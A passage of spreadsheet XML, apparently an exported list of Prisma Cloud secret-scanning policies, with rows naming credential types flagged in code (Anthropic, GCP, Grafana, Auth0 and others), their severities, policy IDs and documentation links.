      <c r="F580" t="inlineStr"/>
      <c r="G580" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J580" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K580" t="inlineStr">
        <is>
          <t>Anthropic API key detected in code</t>
        </is>
      </c>
      <c r="L580" t="inlineStr"/>
      <c r="M580" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N580" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O580" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P580" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q580" t="inlineStr"/>
      <c r="R580" t="inlineStr"/>
      <c r="S580" t="inlineStr"/>
      <c r="T580" t="b">
        <v>0</v>
      </c>
      <c r="U580" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V580" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W580" t="inlineStr">
        <is>
          <t>Anthropic API key</t>
        </is>
      </c>
      <c r="X580" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-109</t>
        </is>
      </c>
      <c r="Y580" t="inlineStr"/>
      <c r="Z580" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA580" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB580" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC580" t="inlineStr">
        <is>
          <t>CKV_SECRET_109</t>
        </is>
      </c>
      <c r="AD580" t="b">
        <v>1</v>
      </c>
      <c r="AE580" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF580" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>ccc9a13d-d0a7-4d73-b552-394eaeaea018</t>
        </is>
      </c>
      <c r="AI580" t="inlineStr"/>
      <c r="AJ580" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK580" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" t="inlineStr"/>
      <c r="B581" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C581" s="2" t="inlineStr"/>
      <c r="D581" t="inlineStr"/>
      <c r="E581" t="inlineStr"/>
      <c r="F581" t="inlineStr"/>
      <c r="G581" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J581" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K581" t="inlineStr">
        <is>
          <t>Sourcegraph access token detected in code</t>
        </is>
      </c>
      <c r="L581" t="inlineStr"/>
      <c r="M581" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N581" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O581" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P581" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q581" t="inlineStr"/>
      <c r="R581" t="inlineStr"/>
      <c r="S581" t="inlineStr"/>
      <c r="T581" t="b">
        <v>0</v>
      </c>
      <c r="U581" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V581" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W581" t="inlineStr">
        <is>
          <t>Sourcegraph access token</t>
        </is>
      </c>
      <c r="X581" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-248</t>
        </is>
      </c>
      <c r="Y581" t="inlineStr"/>
      <c r="Z581" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA581" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB581" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC581" t="inlineStr">
        <is>
          <t>CKV_SECRET_248</t>
        </is>
      </c>
      <c r="AD581" t="b">
        <v>1</v>
      </c>
      <c r="AE581" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF581" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>aabba0a5-b7a3-4abf-9aec-046a4308e9b8</t>
        </is>
      </c>
      <c r="AI581" t="inlineStr"/>
      <c r="AJ581" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK581" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" t="inlineStr"/>
      <c r="B582" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C582" s="2" t="inlineStr"/>
      <c r="D582" t="inlineStr"/>
      <c r="E582" t="inlineStr"/>
      <c r="F582" t="inlineStr"/>
      <c r="G582" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J582" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K582" t="inlineStr">
        <is>
          <t>GCP Service Account Auth Key detected in code</t>
        </is>
      </c>
      <c r="L582" t="inlineStr"/>
      <c r="M582" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N582" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O582" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P582" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q582" t="inlineStr"/>
      <c r="R582" t="inlineStr"/>
      <c r="S582" t="inlineStr"/>
      <c r="T582" t="b">
        <v>0</v>
      </c>
      <c r="U582" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V582" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W582" t="inlineStr">
        <is>
          <t>GCP Service Account Auth Key</t>
        </is>
      </c>
      <c r="X582" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-79</t>
        </is>
      </c>
      <c r="Y582" t="inlineStr"/>
      <c r="Z582" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA582" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB582" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC582" t="inlineStr">
        <is>
          <t>CKV_SECRET_79</t>
        </is>
      </c>
      <c r="AD582" t="b">
        <v>1</v>
      </c>
      <c r="AE582" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF582" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>74da264a-b90d-43a8-9448-64f275da52c4</t>
        </is>
      </c>
      <c r="AI582" t="inlineStr"/>
      <c r="AJ582" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK582" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" t="inlineStr"/>
      <c r="B583" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C583" s="2" t="inlineStr"/>
      <c r="D583" t="inlineStr"/>
      <c r="E583" t="inlineStr"/>
      <c r="F583" t="inlineStr"/>
      <c r="G583" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J583" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K583" t="inlineStr">
        <is>
          <t>Grafana Token detected in code</t>
        </is>
      </c>
      <c r="L583" t="inlineStr"/>
      <c r="M583" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N583" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O583" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P583" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q583" t="inlineStr"/>
      <c r="R583" t="inlineStr"/>
      <c r="S583" t="inlineStr"/>
      <c r="T583" t="b">
        <v>0</v>
      </c>
      <c r="U583" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V583" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W583" t="inlineStr">
        <is>
          <t>Grafana Token</t>
        </is>
      </c>
      <c r="X583" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46</t>
        </is>
      </c>
      <c r="Y583" t="inlineStr"/>
      <c r="Z583" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA583" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB583" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC583" t="inlineStr">
        <is>
          <t>CKV_SECRET_46</t>
        </is>
      </c>
      <c r="AD583" t="b">
        <v>1</v>
      </c>
      <c r="AE583" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF583" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>b0a8cae4-c04e-4a99-a64e-b582d3e83000</t>
        </is>
      </c>
      <c r="AI583" t="inlineStr"/>
      <c r="AJ583" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK583" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" t="inlineStr"/>
      <c r="B584" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C584" s="2" t="inlineStr"/>
      <c r="D584" t="inlineStr"/>
      <c r="E584" t="inlineStr"/>
      <c r="F584" t="inlineStr"/>
      <c r="G584" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J584" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K584" t="inlineStr">
        <is>
          <t>Artifactory Credentials detected in code</t>
        </is>
      </c>
      <c r="L584" t="inlineStr"/>
      <c r="M584" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N584" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O584" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P584" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q584" t="inlineStr"/>
      <c r="R584" t="inlineStr"/>
      <c r="S584" t="inlineStr"/>
      <c r="T584" t="b">
        <v>0</v>
      </c>
      <c r="U584" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V584" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W584" t="inlineStr">
        <is>
          <t>Artifactory Credentials</t>
        </is>
      </c>
      <c r="X584" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-1</t>
        </is>
      </c>
      <c r="Y584" t="inlineStr"/>
      <c r="Z584" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA584" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB584" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC584" t="inlineStr">
        <is>
          <t>CKV_SECRET_1</t>
        </is>
      </c>
      <c r="AD584" t="b">
        <v>1</v>
      </c>
      <c r="AE584" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF584" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>a3934796-b64a-4295-849f-417651ecae8b</t>
        </is>
      </c>
      <c r="AI584" t="inlineStr"/>
      <c r="AJ584" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK584" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" t="inlineStr"/>
      <c r="B585" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C585" s="2" t="inlineStr"/>
      <c r="D585" t="inlineStr"/>
      <c r="E585" t="inlineStr"/>
      <c r="F585" t="inlineStr"/>
      <c r="G585" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J585" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K585" t="inlineStr">
        <is>
          <t>Scalr API Token detected in code</t>
        </is>
      </c>
      <c r="L585" t="inlineStr"/>
      <c r="M585" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N585" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O585" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P585" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q585" t="inlineStr"/>
      <c r="R585" t="inlineStr"/>
      <c r="S585" t="inlineStr"/>
      <c r="T585" t="b">
        <v>0</v>
      </c>
      <c r="U585" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V585" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W585" t="inlineStr">
        <is>
          <t>Scalr API Token</t>
        </is>
      </c>
      <c r="X585" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-76</t>
        </is>
      </c>
      <c r="Y585" t="inlineStr"/>
      <c r="Z585" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA585" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB585" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC585" t="inlineStr">
        <is>
          <t>CKV_SECRET_76</t>
        </is>
      </c>
      <c r="AD585" t="b">
        <v>1</v>
      </c>
      <c r="AE585" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF585" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>6e65aa0b-c144-476e-90c4-1a8d1cd9e725</t>
        </is>
      </c>
      <c r="AI585" t="inlineStr"/>
      <c r="AJ585" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK585" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" t="inlineStr"/>
      <c r="B586" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C586" s="2" t="inlineStr"/>
      <c r="D586" t="inlineStr"/>
      <c r="E586" t="inlineStr"/>
      <c r="F586" t="inlineStr"/>
      <c r="G586" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J586" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K586" t="inlineStr">
        <is>
          <t>Auth0 Key detected in code</t>
        </is>
      </c>
      <c r="L586" t="inlineStr"/>
      <c r="M586" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N586" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O586" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P586" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q586" t="inlineStr"/>
      <c r="R586" t="inlineStr"/>
      <c r="S586" t="inlineStr"/>
      <c r="T586" t="b">
        <v>0</v>
      </c>
      <c r="U586" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V586" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W586" t="inlineStr">
        <is>
          <t>Auth0 Keys</t>
        </is>
      </c>
      <c r="X586" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26</t>
        </is>
      </c>
      <c r="Y586" t="inlineStr"/>
      <c r="Z586" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA586" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB586" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC586" t="inlineStr">
        <is>
          <t>CKV_SECRET_26</t>
        </is>
      </c>
      <c r="AD586" t="b">
        <v>1</v>
      </c>
      <c r="AE586" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF586" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>8ebec33d-9b5e-4a9d-8796-0da742b67bef</t>
        </is>
      </c>
      <c r="AI586" t="inlineStr"/>
      <c r="AJ586" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK586" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" t="inlineStr"/>
      <c r="B587" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C587" s="2" t="inlineStr"/>
      <c r="D587" t="inlineStr"/>
      <c r="E587" t="inlineStr"/>
      <c r="F587" t="inlineStr"/>
      <c r="G587" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J587" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K587" t="inlineStr">
        <is>
          <t>Clarifai API Key detected in code</t>
        </is>
      </c>
      <c r="L587" t="inlineStr"/>
      <c r="M587" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N587" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O587" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P587" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q587" t="inlineStr"/>
      <c r="R587" t="inlineStr"/>
      <c r="S587" t="inlineStr"/>
      <c r="T587" t="b">
        <v>0</v>
      </c>
      <c r="U587" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V587" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W587" t="inlineStr">
        <is>
          <t>Clarifai API Key</t>
        </is>
      </c>
      <c r="X587" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-114</t>
        </is>
      </c>
      <c r="Y587" t="inlineStr"/>
      <c r="Z587" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA587" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB587" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC587" t="inlineStr">
        <is>
          <t>CKV_SECRET_114</t>
        </is>
      </c>
      <c r="AD587" t="b">
        <v>1</v>
      </c>
      <c r="AE587" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF587" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>c324960a-8f7d-4f00-98b6-a442cdb0f433</t>
        </is>
      </c>
      <c r="AI587" t="inlineStr"/>
      <c r="AJ587" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK587" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" t="inlineStr"/>
      <c r="B588" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C588" s="2" t="inlineStr"/>
      <c r="D588" t="inlineStr"/>
      <c r="E588" t="inlineStr"/>
      <c r="F588" t="inlineStr"/>
      <c r="G588" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J588" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K588" t="inlineStr">
        <is>
          <t>SSH Password detected in code</t>
        </is>
      </c>
      <c r="L588" t="inlineStr"/>
      <c r="M588" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N588" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O588" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P588" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q588" t="inlineStr"/>
      <c r="R588" t="inlineStr"/>
      <c r="S588" t="inlineStr"/>
      <c r="T588" t="b">
        <v>0</v>
      </c>
      <c r="U588" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V588" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W588" t="inlineStr">
        <is>
          <t>SSH Password</t>
        </is>
      </c>
      <c r="X588" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-223</t>
        </is>
      </c>
      <c r="Y588" t="inlineStr"/>
      <c r="Z588" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA588" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB588" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC588" t="inlineStr">
        <is>
          <t>CKV_SECRET_223</t>
        </is>
      </c>
      <c r="AD588" t="b">
        <v>1</v>
      </c>
      <c r="AE588" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF588" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>9cf0636b-1a4e-41a6-b6d6-2f7106ec946a</t>
        </is>
      </c>
      <c r="AI588" t="inlineStr"/>
      <c r="AJ588" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK588" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" t="inlineStr"/>
      <c r="B589" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C589" s="2" t="inlineStr"/>
      <c r="D589" t="inlineStr"/>
      <c r="E589" t="inlineStr"/>
      <c r="F589" t="inlineStr"/>
      <c r="G589" t="b">
        <v>1</v>
      </c>
      <c r="H5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89" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J589" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K589" t="inlineStr">
        <is>
          <t>Yandex Predictor API key detected in code</t>
        </is>
      </c>
      <c r="L589" t="inlineStr"/>
      <c r="M589" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N589" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O589" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P589" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q589" t="inlineStr"/>
      <c r="R589" t="inlineStr"/>
      <c r="S589" t="inlineStr"/>
      <c r="T589" t="b">
        <v>0</v>
      </c>
      <c r="U589" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V589" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W589" t="inlineStr">
        <is>
          <t>Yandex Predictor API key</t>
        </is>
      </c>
      <c r="X589" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-72</t>
        </is>
      </c>
      <c r="Y589" t="inlineStr"/>
      <c r="Z589" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA589" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB589" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC589" t="inlineStr">
        <is>
          <t>CKV_SECRET_72</t>
        </is>
      </c>
      <c r="AD589" t="b">
        <v>1</v>
      </c>
      <c r="AE589" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF589" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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89" t="inlineStr">
        <is>
          <t>063f37de-6e7e-4d1f-8607-36502f9dfeaa</t>
        </is>
      </c>
      <c r="AI589" t="inlineStr"/>
      <c r="AJ589" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK589" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" t="inlineStr"/>
      <c r="B590" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C590" s="2" t="inlineStr"/>
      <c r="D590" t="inlineStr"/>
      <c r="E590" t="inlineStr"/>
      <c r="F590" t="inlineStr"/>
      <c r="G590" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J590" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K590" t="inlineStr">
        <is>
          <t>IBM COS HMAC credential detected in code</t>
        </is>
      </c>
      <c r="L590" t="inlineStr"/>
      <c r="M590" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N590" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O590" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P590" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q590" t="inlineStr"/>
      <c r="R590" t="inlineStr"/>
      <c r="S590" t="inlineStr"/>
      <c r="T590" t="b">
        <v>0</v>
      </c>
      <c r="U590" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V590" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W590" t="inlineStr">
        <is>
          <t>IBM COS HMAC credentials</t>
        </is>
      </c>
      <c r="X590" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-8</t>
        </is>
      </c>
      <c r="Y590" t="inlineStr"/>
      <c r="Z590" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA590" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB590" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC590" t="inlineStr">
        <is>
          <t>CKV_SECRET_8</t>
        </is>
      </c>
      <c r="AD590" t="b">
        <v>1</v>
      </c>
      <c r="AE590" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF590" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
